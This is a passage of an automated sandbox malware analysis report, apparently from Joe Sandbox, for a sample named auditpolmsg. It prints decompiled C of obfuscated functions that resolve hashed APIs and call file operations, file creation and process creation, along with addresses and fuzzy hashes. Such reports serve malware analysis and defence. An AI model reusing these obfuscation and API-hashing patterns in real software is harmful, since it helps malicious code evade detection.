                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x00367120
                                                        0x00367120
                                                        0x00367120
                                                        0x00367125
                                                        0x00367125
                                                        0x00367125
                                                        0x00367125
                                                        0x0036712a
                                                        0x00000000
                                                        0x00000000
                                                        0x00367130
                                                        0x0036723f
                                                        0x00367246
                                                        0x00367248
                                                        0x00367260
                                                        0x00367260
                                                        0x00367266
                                                        0x00367268
                                                        0x0036726e
                                                        0x00367271
                                                        0x00367276
                                                        0x00367278
                                                        0x0036728b
                                                        0x00367290
                                                        0x00367290
                                                        0x00367297
                                                        0x00367299
                                                        0x0036729e
                                                        0x003672a0
                                                        0x003672b3
                                                        0x003672b8
                                                        0x003672b8
                                                        0x003672c5
                                                        0x00367136
                                                        0x00367136
                                                        0x0036713b
                                                        0x00367190
                                                        0x00367195
                                                        0x00000000
                                                        0x0036719b
                                                        0x003671a5
                                                        0x003671aa
                                                        0x00000000
                                                        0x003671aa
                                                        0x0036713d
                                                        0x0036713d
                                                        0x00367184
                                                        0x00367189
                                                        0x00000000
                                                        0x0036713f
                                                        0x00367144
                                                        0x0036716e
                                                        0x00367173
                                                        0x00000000
                                                        0x00367146
                                                        0x00367146
                                                        0x0036714b
                                                        0x00000000
                                                        0x00367151
                                                        0x00367158
                                                        0x0036715d
                                                        0x00000000
                                                        0x0036715d
                                                        0x0036714b
                                                        0x00367144
                                                        0x0036713d
                                                        0x0036713b
                                                        0x00000000
                                                        0x00367130
                                                        0x003671b4
                                                        0x003671b9
                                                        0x00367207
                                                        0x0036720c
                                                        0x00000000
                                                        0x0036720e
                                                        0x00367218
                                                        0x0036721d
                                                        0x00000000
                                                        0x0036721d
                                                        0x003671bb
                                                        0x003671bb
                                                        0x003671f8
                                                        0x003671fd
                                                        0x00000000
                                                        0x003671bd
                                                        0x003671bd
                                                        0x003671c2
                                                        0x003671df
                                                        0x003671e4
                                                        0x00000000
                                                        0x003671c4
                                                        0x003671c4
                                                        0x003671c9
                                                        0x00000000
                                                        0x003671cb
                                                        0x003671cb
                                                        0x00000000
                                                        0x003671cb
                                                        0x003671c9
                                                        0x003671c2
                                                        0x003671bb
                                                        0x00000000
                                                        0x00367227
                                                        0x00367227
                                                        0x00367227
                                                        0x00367232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003668AC), ref: 00367266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: (~`$Dry9$Dry9
                                                        • API String ID: 1029625771-3693350462
                                                        • Opcode ID: d6052f5de8cd3b83bd31475f9d02f6a8d66677d4098382f9e2c18b089c4fae7f
                                                        • Instruction ID: e2531bed6a4905cb41436632e187aafb8a9d82263fce682fbb651b8bb3b5c2b8
                                                        • Opcode Fuzzy Hash: d6052f5de8cd3b83bd31475f9d02f6a8d66677d4098382f9e2c18b089c4fae7f
                                                        • Instruction Fuzzy Hash: EA31D524B1D10043DE276BBA58A536E11AED7A270CFE1C427F061CF79DDD66CD8243A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 301 363780-363793 302 363795-3637ab call 363f00 call 363e60 301->302 303 3637b0-3637c5 301->303 302->303 307 3637c7-3637dd call 363f00 call 363e60 303->307 308 3637e2-3637fa 303->308 307->308 315 363817-363832 308->315 316 3637fc-363812 call 363f00 call 363e60 308->316 321 363834-36384a call 363f00 call 363e60 315->321 322 36384f-36385e 315->322 316->315 321->322 329 363860-363876 call 363f00 call 363e60 322->329 330 36387b-3638b4 322->330 329->330 335 3638b6-3638cc call 363f00 call 363e60 330->335 336 3638d1-3638e2 SHFileOperationW 330->336 335->336
                                                        C-Code - Quality: 62%
                                                        			E00363780(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                        				char _v520;
                                                        				char _v528;
                                                        				char _v536;
                                                        				char _v1040;
                                                        				char _v1056;
                                                        				short _v1072;
                                                        				char* _v1076;
                                                        				char* _v1080;
                                                        				intOrPtr _v1084;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr* _t18;
                                                        				intOrPtr* _t20;
                                                        				signed int _t26;
                                                        				void* _t36;
                                                        				void* _t63;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				struct _SHFILEOPSTRUCTW* _t73;
                                                        
                                                        				_t70 =  &_v1072;
                                                        				_t12 =  *0x36ddc0;
                                                        				_t66 = __ecx;
                                                        				_t63 = __edx;
                                                        				if(_t12 == 0) {
                                                        					_t12 = E00363E60(_t36, E00363F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x36ddc0 = _t12;
                                                        				}
                                                        				 *_t12( &_v1072, 0, 0x1e);
                                                        				_t14 =  *0x36ddc0;
                                                        				_t71 = _t70 + 0xc;
                                                        				if(_t14 == 0) {
                                                        					_t14 = E00363E60(_t36, E00363F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x36ddc0 = _t14;
                                                        				}
                                                        				 *_t14( &_v1040, 0, 0x208);
                                                        				_t16 =  *0x36ddc0;
                                                        				_t72 = _t71 + 0xc;
                                                        				if(_t16 == 0) {
                                                        					_t16 = E00363E60(_t36, E00363F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x36ddc0 = _t16;
                                                        				}
                                                        				 *_t16( &_v520, 0, 0x208);
                                                        				_t18 =  *0x36e298;
                                                        				_t73 = _t72 + 0xc;
                                                        				if(_t18 == 0) {
                                                        					_t18 = E00363E60(_t36, E00363F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x36e298 = _t18;
                                                        				}
                                                        				 *_t18( &_v1040, _t66);
                                                        				_t20 =  *0x36e298;
                                                        				if(_t20 == 0) {
                                                        					_t20 = E00363E60(_t36, E00363F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x36e298 = _t20;
                                                        				}
                                                        				 *_t20( &_v528, _t63);
                                                        				_v1084 = 1;
                                                        				_v1080 =  &_v1056;
                                                        				_v1076 =  &_v536;
                                                        				_v1072 = 0xe14;
                                                        				if( *0x36e30c == 0) {
                                                        					 *0x36e30c = E00363E60(_t36, E00363F00(0xd9518805), 0x262a6194, _t69);
                                                        				}
                                                        				_t26 = SHFileOperationW(_t73); // executed
                                                        				asm("sbb eax, eax");
                                                        				return  ~_t26 + 1;
                                                        			}


























                                                        0x00363785
                                                        0x00363780
                                                        0x0036378c
                                                        0x0036378f
                                                        0x00363793
                                                        0x003637a6
                                                        0x003637ab
                                                        0x003637ab
                                                        0x003637b9
                                                        0x003637bb
                                                        0x003637c0
                                                        0x003637c5
                                                        0x003637d8
                                                        0x003637dd
                                                        0x003637dd
                                                        0x003637ee
                                                        0x003637f0
                                                        0x003637f5
                                                        0x003637fa
                                                        0x0036380d
                                                        0x00363812
                                                        0x00363812
                                                        0x00363826
                                                        0x00363828
                                                        0x0036382d
                                                        0x00363832
                                                        0x00363845
                                                        0x0036384a
                                                        0x0036384a
                                                        0x00363855
                                                        0x00363857
                                                        0x0036385e
                                                        0x00363871
                                                        0x00363876
                                                        0x00363876
                                                        0x00363884
                                                        0x0036388a
                                                        0x00363892
                                                        0x0036389d
                                                        0x003638a6
                                                        0x003638b4
                                                        0x003638cc
                                                        0x003638cc
                                                        0x003638d5
                                                        0x003638d9
                                                        0x003638e2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: X~$X~$X~
                                                        • API String ID: 3080627654-3258893172
                                                        • Opcode ID: c98417ce40f70872d7050a3691adb52d0956a9b2c71fc710793724bc643a1936
                                                        • Instruction ID: 93d355f0a0f215bb58f9b664708e5243192e8884c6be9fdc279c4e77836baf76
                                                        • Opcode Fuzzy Hash: c98417ce40f70872d7050a3691adb52d0956a9b2c71fc710793724bc643a1936
                                                        • Instruction Fuzzy Hash: C631CFB5B003414BD716BB7ADC117AB37EAAB85704F00C92CF415CF289EBB4DA0587A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 343 3680a0-36815b 344 368163-368168 343->344 345 368170-368175 344->345 346 36817b 345->346 347 368338-36833d 345->347 348 368287-36829b call 3634c0 346->348 349 368181-368186 346->349 350 36836f-368377 347->350 351 36833f-368344 347->351 372 36829d-3682b5 call 363f00 call 363e60 348->372 373 3682bb-3682e3 348->373 355 368252-368259 349->355 356 36818c-368191 349->356 353 368397-3683bb CreateFileW 350->353 354 368379-368391 call 363f00 call 363e60 350->354 357 368346-36834b 351->357 358 368365-36836a 351->358 361 3683ee-3683fa 353->361 362 3683bd-3683c2 353->362 354->353 363 368276-368282 355->363 364 36825b-368271 call 363f00 call 363e60 355->364 365 3681e3-36821a 356->365 366 368193-368198 356->366 367 3683c7-3683ce 357->367 368 36834d-368352 357->368 358->345 362->345 363->345 364->363 369 368237-36824d 365->369 370 36821c-368232 call 363f00 call 363e60 365->370 366->368 378 36819e-3681e1 call 36b6e0 366->378 376 3683d0-3683e6 call 363f00 call 363e60 367->376 377 3683eb-3683ec CloseHandle 367->377 368->345 371 368358-368364 368->371 369->345 370->369 372->373 396 3682e5-3682fb call 363f00 call 363e60 373->396 397 368300-36830b 373->397 376->377 377->361 378->345 396->397 406 36830d-368323 call 363f00 call 363e60 397->406 407 368328-368333 397->407 406->407 407->344
                                                        C-Code - Quality: 71%
                                                        			E003680A0(signed int __edx) {
                                                        				short _v524;
                                                        				struct _SECURITY_ATTRIBUTES* _v532;
                                                        				intOrPtr _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr _v544;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				intOrPtr _v560;
                                                        				char _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				intOrPtr _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t58;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				void* _t73;
                                                        				intOrPtr* _t78;
                                                        				intOrPtr* _t80;
                                                        				void* _t82;
                                                        				void* _t83;
                                                        				intOrPtr* _t86;
                                                        				void* _t88;
                                                        				intOrPtr _t89;
                                                        				intOrPtr* _t90;
                                                        				void* _t92;
                                                        				void* _t96;
                                                        				intOrPtr _t101;
                                                        				char _t105;
                                                        				signed int _t122;
                                                        				void* _t125;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				signed int* _t129;
                                                        				void* _t131;
                                                        
                                                        				_t122 = __edx;
                                                        				_t129 =  &_v596;
                                                        				_v584 = 0x9318;
                                                        				_t58 = 0x343bfd89;
                                                        				_v584 = _v584 ^ 0xde90c338;
                                                        				_v584 = _v584 ^ 0xde905120;
                                                        				_v596 = 0x7d19;
                                                        				_v596 = _v596 << 9;
                                                        				_v596 = _v596 >> 0xe;
                                                        				_v596 = _v596 + 0xffff07e5;
                                                        				_v596 = _v596 | 0x8aea6eef;
                                                        				_v596 = _v596 + 0xd867;
                                                        				_v596 = _v596 + 0x9c41;
                                                        				_v596 = _v596 + 0x3de0;
                                                        				_v596 = _v596 + 0x218b;
                                                        				_v596 = _v596 ^ 0x00014403;
                                                        				_v592 = 0x2591;
                                                        				_t128 = _v584;
                                                        				_t96 = 0;
                                                        				_v592 = _v592 * 0x7d;
                                                        				_v592 = _v592 + 0x8d68;
                                                        				_v592 = _v592 + 0xffff8911;
                                                        				_v592 = _v592 * 0x6a;
                                                        				_v592 = _v592 + 0xffff93d5;
                                                        				_v592 = _v592 ^ 0x07a13cd2;
                                                        				_v588 = 0x789;
                                                        				_v588 = _v588 >> 1;
                                                        				_v588 = _v588 ^ 0xaee58af2;
                                                        				_v588 = _v588 ^ 0xaee58936;
                                                        				while(1) {
                                                        					L1:
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t131 = _t58 - 0xea5411f;
                                                        							if(_t131 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t131 == 0) {
                                                        								_t73 = E003634C0(0x36d970);
                                                        								_t122 =  *0x36e158;
                                                        								_t127 = _t73;
                                                        								if(_t122 == 0) {
                                                        									_t122 = E00363E60(_t96, E00363F00(0xc6fbcd74), 0xba71dd03, _t128);
                                                        									 *0x36e158 = _t122;
                                                        								}
                                                        								_t101 =  *0x36e54c; // 0x5ce050
                                                        								_t50 = _t101 + 0x260; // 0x5ce2b0
                                                        								_t51 = _t101 + 0x18; // 0x5ce068
                                                        								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
                                                        								_t78 =  *0x36e494;
                                                        								_t129 =  &(_t129[5]);
                                                        								if(_t78 == 0) {
                                                        									_t83 = E00363F00(0x9bab0b12);
                                                        									_t122 = 0x7facde30;
                                                        									_t78 = E00363E60(_t96, _t83, 0x7facde30, _t128);
                                                        									 *0x36e494 = _t78;
                                                        								}
                                                        								_t125 =  *_t78();
                                                        								_t80 =  *0x36df30;
                                                        								if(_t80 == 0) {
                                                        									_t82 = E00363F00(0x9bab0b12);
                                                        									_t122 = 0x5010a54d;
                                                        									_t80 = E00363E60(_t96, _t82, 0x5010a54d, _t128);
                                                        									 *0x36df30 = _t80;
                                                        								}
                                                        								 *_t80(_t125, 0, _t127);
                                                        								_t58 = 0x2c2d24c8;
                                                        								goto L1;
                                                        							} else {
                                                        								if(_t58 == 0x2f64d8b) {
                                                        									_t86 =  *0x36e1d4;
                                                        									if(_t86 == 0) {
                                                        										_t88 = E00363F00(0x9bab0b12);
                                                        										_t122 = 0xa229df38;
                                                        										_t86 = E00363E60(_t96, _t88, 0xa229df38, _t128);
                                                        										 *0x36e1d4 = _t86;
                                                        									}
                                                        									 *_t86( &_v572);
                                                        									_t58 = 0xc5e088d;
                                                        									continue;
                                                        								} else {
                                                        									if(_t58 == 0x6f65414) {
                                                        										_t89 = _v568;
                                                        										_t105 = _v572;
                                                        										_v560 = _t89;
                                                        										_v552 = _t89;
                                                        										_v544 = _t89;
                                                        										_v536 = _t89;
                                                        										_t90 =  *0x36dee4;
                                                        										_v564 = _t105;
                                                        										_v556 = _t105;
                                                        										_v548 = _t105;
                                                        										_v540 = _t105;
                                                        										_v532 = 0;
                                                        										if(_t90 == 0) {
                                                        											_t92 = E00363F00(0x9bab0b12);
                                                        											_t122 = 0x4bf45878;
                                                        											_t90 = E00363E60(_t96, _t92, 0x4bf45878, _t128);
                                                        											 *0x36dee4 = _t90;
                                                        										}
                                                        										 *_t90(_t128, 0,  &_v564, 0x28);
                                                        										_t58 = 0x3557bd8c;
                                                        										_t96 =  !=  ? 1 : _t96;
                                                        										continue;
                                                        									} else {
                                                        										if(_t58 != 0xc5e088d) {
                                                        											goto L24;
                                                        										} else {
                                                        											_v580 = 0xa8c00;
                                                        											_v576 = 0;
                                                        											_v596 = E0036B6E0(_v580, _v576, 0x989680, 0);
                                                        											_v592 = _t122;
                                                        											_v588 = _v588 - _v596;
                                                        											_t58 = 0xea5411f;
                                                        											asm("sbb [esp+0x2c], ecx");
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L35:
                                                        						}
                                                        						if(_t58 == 0x2c2d24c8) {
                                                        							if( *0x36de04 == 0) {
                                                        								_t66 = E00363F00(0x9bab0b12);
                                                        								_t122 = 0xb66d748a;
                                                        								 *0x36de04 = E00363E60(_t96, _t66, 0xb66d748a, _t128);
                                                        							}
                                                        							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
                                                        							_t128 = _t64;
                                                        							if(_t128 == 0xffffffff) {
                                                        								goto L34;
                                                        							} else {
                                                        								_t58 = 0x6f65414;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(_t58 == 0x343bfd89) {
                                                        								_t58 = 0x2f64d8b;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t58 == 0x3557bd8c) {
                                                        									if( *0x36de3c == 0) {
                                                        										 *0x36de3c = E00363E60(_t96, E00363F00(0x9bab0b12), 0x20de7595, _t128);
                                                        									}
                                                        									CloseHandle(_t128); // executed
                                                        									L34:
                                                        									return _t96;
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L35;
                                                        						L24:
                                                        					} while (_t58 != 0xcfe8e);
                                                        					return _t96;
                                                        					goto L35;
                                                        				}
                                                        			}













































                                                        0x003680a0
                                                        0x003680a0
                                                        0x003680a6
                                                        0x003680ae
                                                        0x003680b3
                                                        0x003680bb
                                                        0x003680c3
                                                        0x003680ca
                                                        0x003680ce
                                                        0x003680d2
                                                        0x003680d9
                                                        0x003680e0
                                                        0x003680e7
                                                        0x003680ee
                                                        0x003680f5
                                                        0x003680fc
                                                        0x00368103
                                                        0x00368112
                                                        0x00368116
                                                        0x00368119
                                                        0x0036811d
                                                        0x00368125
                                                        0x00368133
                                                        0x00368137
                                                        0x0036813f
                                                        0x00368147
                                                        0x0036814f
                                                        0x00368153
                                                        0x0036815b
                                                        0x00368163
                                                        0x00368163
                                                        0x00368168
                                                        0x00368170
                                                        0x00368170
                                                        0x00368170
                                                        0x00368170
                                                        0x00368175
                                                        0x00000000
                                                        0x00000000
                                                        0x0036817b
                                                        0x0036828c
                                                        0x00368291
                                                        0x00368297
                                                        0x0036829b
                                                        0x003682b3
                                                        0x003682b5
                                                        0x003682b5
                                                        0x003682bb
                                                        0x003682c1
                                                        0x003682c8
                                                        0x003682d7
                                                        0x003682d9
                                                        0x003682de
                                                        0x003682e3
                                                        0x003682ea
                                                        0x003682ef
                                                        0x003682f6
                                                        0x003682fb
                                                        0x003682fb
                                                        0x00368302
                                                        0x00368304
                                                        0x0036830b
                                                        0x00368312
                                                        0x00368317
                                                        0x0036831e
                                                        0x00368323
                                                        0x00368323
                                                        0x0036832c
                                                        0x0036832e
                                                        0x00000000
                                                        0x00368181
                                                        0x00368186
                                                        0x00368252
                                                        0x00368259
                                                        0x00368260
                                                        0x00368265
                                                        0x0036826c
                                                        0x00368271
                                                        0x00368271
                                                        0x0036827b
                                                        0x0036827d
                                                        0x00000000
                                                        0x0036818c
                                                        0x00368191
                                                        0x003681e3
                                                        0x003681e7
                                                        0x003681eb
                                                        0x003681ef
                                                        0x003681f3
                                                        0x003681f7
                                                        0x003681fb
                                                        0x00368200
                                                        0x00368204
                                                        0x00368208
                                                        0x0036820c
                                                        0x00368210
                                                        0x0036821a
                                                        0x00368221
                                                        0x00368226
                                                        0x0036822d
                                                        0x00368232
                                                        0x00368232
                                                        0x00368241
                                                        0x00368245
                                                        0x0036824a
                                                        0x00000000
                                                        0x00368193
                                                        0x00368198
                                                        0x00000000
                                                        0x0036819e
                                                        0x003681a0
                                                        0x003681a8
                                                        0x003681c4
                                                        0x003681c8
                                                        0x003681d4
                                                        0x003681d8
                                                        0x003681dd
                                                        0x00000000
                                                        0x003681dd
                                                        0x00368198
                                                        0x00368191
                                                        0x00368186
                                                        0x00000000
                                                        0x0036817b
                                                        0x0036833d
                                                        0x00368377
                                                        0x0036837e
                                                        0x00368383
                                                        0x00368391
                                                        0x00368391
                                                        0x003683b4
                                                        0x003683b6
                                                        0x003683bb
                                                        0x00000000
                                                        0x003683bd
                                                        0x003683bd
                                                        0x00000000
                                                        0x003683bd
                                                        0x0036833f
                                                        0x00368344
                                                        0x00368365
                                                        0x00000000
                                                        0x00368346
                                                        0x0036834b
                                                        0x003683ce
                                                        0x003683e6
                                                        0x003683e6
                                                        0x003683ec
                                                        0x003683f1
                                                        0x003683fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0036834b
                                                        0x00368344
                                                        0x00000000
                                                        0x0036834d
                                                        0x0036834d
                                                        0x00368364
                                                        0x00000000
                                                        0x00368364

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003683B4
                                                        • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 003683EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateFileHandle
                                                        • String ID: P\
                                                        • API String ID: 3498533004-2375622079
                                                        • Opcode ID: 58be425af0902c35dc7d67d4173eb15eefa413023846009e824c62ad9d0221dd
                                                        • Instruction ID: 6baa314f0fb074c8b95ea8bd7f7b004797941280976786ac557521fda87bcfc5
                                                        • Opcode Fuzzy Hash: 58be425af0902c35dc7d67d4173eb15eefa413023846009e824c62ad9d0221dd
                                                        • Instruction Fuzzy Hash: 1781E274A083008FD71ADF68C85462FB7E9EB98744F10892EF185CB398EBB5CD058B52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 415 364b70-364b80 416 364b82-364b98 call 363f00 call 363e60 415->416 417 364b9d-364bba 415->417 416->417 422 364bd7-364bf5 CreateProcessW 417->422 423 364bbc-364bd2 call 363f00 call 363e60 417->423 426 364bf7-364bfd 422->426 427 364c73-364c7a 422->427 423->422 429 364c14-364c1b 426->429 430 364bff-364c13 426->430 431 364c1d-364c33 call 363f00 call 363e60 429->431 432 364c38-364c45 429->432 431->432 439 364c47-364c5d call 363f00 call 363e60 432->439 440 364c62-364c72 432->440 439->440
                                                        C-Code - Quality: 60%
                                                        			E00364B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                        				struct _STARTUPINFOW _v72;
                                                        				struct _PROCESS_INFORMATION _v88;
                                                        				intOrPtr* _t9;
                                                        				int _t12;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t17;
                                                        				WCHAR* _t44;
                                                        				WCHAR* _t45;
                                                        
                                                        				_t46 = __ebp;
                                                        				_t26 = __ebx;
                                                        				_t9 =  *0x36ddc0;
                                                        				_t45 = __edx;
                                                        				_t44 = __ecx;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E00363E60(__ebx, E00363F00(0xc6fbcd74), 0x7e0ae558, __ebp);
                                                        					 *0x36ddc0 = _t9;
                                                        				}
                                                        				 *_t9( &_v72, 0, 0x44);
                                                        				_v72.cb = 0x44;
                                                        				if( *0x36e21c == 0) {
                                                        					 *0x36e21c = E00363E60(_t26, E00363F00(0x9bab0b12), 0xbd6cc871, _t46);
                                                        				}
                                                        				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                        				if(_t12 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					if(_a12 == 0) {
                                                        						_t15 =  *0x36de3c;
                                                        						if(_t15 == 0) {
                                                        							_t15 = E00363E60(_t26, E00363F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x36de3c = _t15;
                                                        						}
                                                        						 *_t15(_v88.hProcess);
                                                        						_t17 =  *0x36de3c;
                                                        						if(_t17 == 0) {
                                                        							_t17 = E00363E60(_t26, E00363F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x36de3c = _t17;
                                                        						}
                                                        						 *_t17(_v88.hProcess);
                                                        						return 1;
                                                        					} else {
                                                        						asm("movdqu xmm0, [esp+0x8]");
                                                        						asm("movdqu [eax], xmm0");
                                                        						return 1;
                                                        					}
                                                        				}
                                                        			}











                                                        0x00364b70
                                                        0x00364b70
                                                        0x00364b70
                                                        0x00364b79
                                                        0x00364b7c
                                                        0x00364b80
                                                        0x00364b93
                                                        0x00364b98
                                                        0x00364b98
                                                        0x00364ba6
                                                        0x00364bb0
                                                        0x00364bba
                                                        0x00364bd2
                                                        0x00364bd2
                                                        0x00364bf1
                                                        0x00364bf5
                                                        0x00364c7a
                                                        0x00364bf7
                                                        0x00364bfd
                                                        0x00364c14
                                                        0x00364c1b
                                                        0x00364c2e
                                                        0x00364c33
                                                        0x00364c33
                                                        0x00364c3c
                                                        0x00364c3e
                                                        0x00364c45
                                                        0x00364c58
                                                        0x00364c5d
                                                        0x00364c5d
                                                        0x00364c66
                                                        0x00364c72
                                                        0x00364bff
                                                        0x00364bff
                                                        0x00364c05
                                                        0x00364c13
                                                        0x00364c13
                                                        0x00364bfd

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00364BF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D$X~
                                                        • API String ID: 963392458-2090554203
                                                        • Opcode ID: b97603f993cf1cf82eadc6f9259a0fd3afe74787e60116d0603cd86aca4a7a63
                                                        • Instruction ID: 89817ae4b755923d15b2a1efda2ccee6f7a8ca6e8ceb0aa8fabf457260306359
                                                        • Opcode Fuzzy Hash: b97603f993cf1cf82eadc6f9259a0fd3afe74787e60116d0603cd86aca4a7a63
                                                        • Instruction Fuzzy Hash: E7219F35B003015BEB16AB7ADC51BAB37AAABD1B44F00C42CF654CF2A4EAB1C9158751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 529 3630a0-3630b6 530 3630ba-3630bf 529->530 531 3630c0-3630c5 530->531 532 363201-363206 531->532 533 3630cb 531->533 536 363245-36324c 532->536 537 363208-36320d 532->537 534 3630d1-3630d6 533->534 535 3631ed-3631f1 533->535 540 3630dc-3630e1 534->540 541 3631da-3631e8 534->541 538 3632f6-363300 535->538 539 3631f7-3631fc 535->539 544 36324e-363264 call 363f00 call 363e60 536->544 545 363269-363274 536->545 542 363213-363218 537->542 543 3632ab-3632b3 537->543 539->531 546 3630e7-3630ec 540->546 547 3631a0-3631a8 540->547 541->531 548 36322d-363232 542->548 549 36321a-363228 call 363d00 542->549 550 3632b5-3632cd call 363f00 call 363e60 543->550 551 3632d3-3632f3 543->551 544->545 562 363276-36328c call 363f00 call 363e60 545->562 563 363291-36329f RtlAllocateHeap 545->563 546->548 554 3630f2-36319b 546->554 556 3631aa-3631c2 call 363f00 call 363e60 547->556 557 3631c8-3631d5 547->557 548->531 558 363238-363242 548->558 549->530 550->551 551->538 554->530 556->557 557->530 562->563 563->538 569 3632a1-3632a6 563->569 569->530
                                                        C-Code - Quality: 71%
                                                        			E003630A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
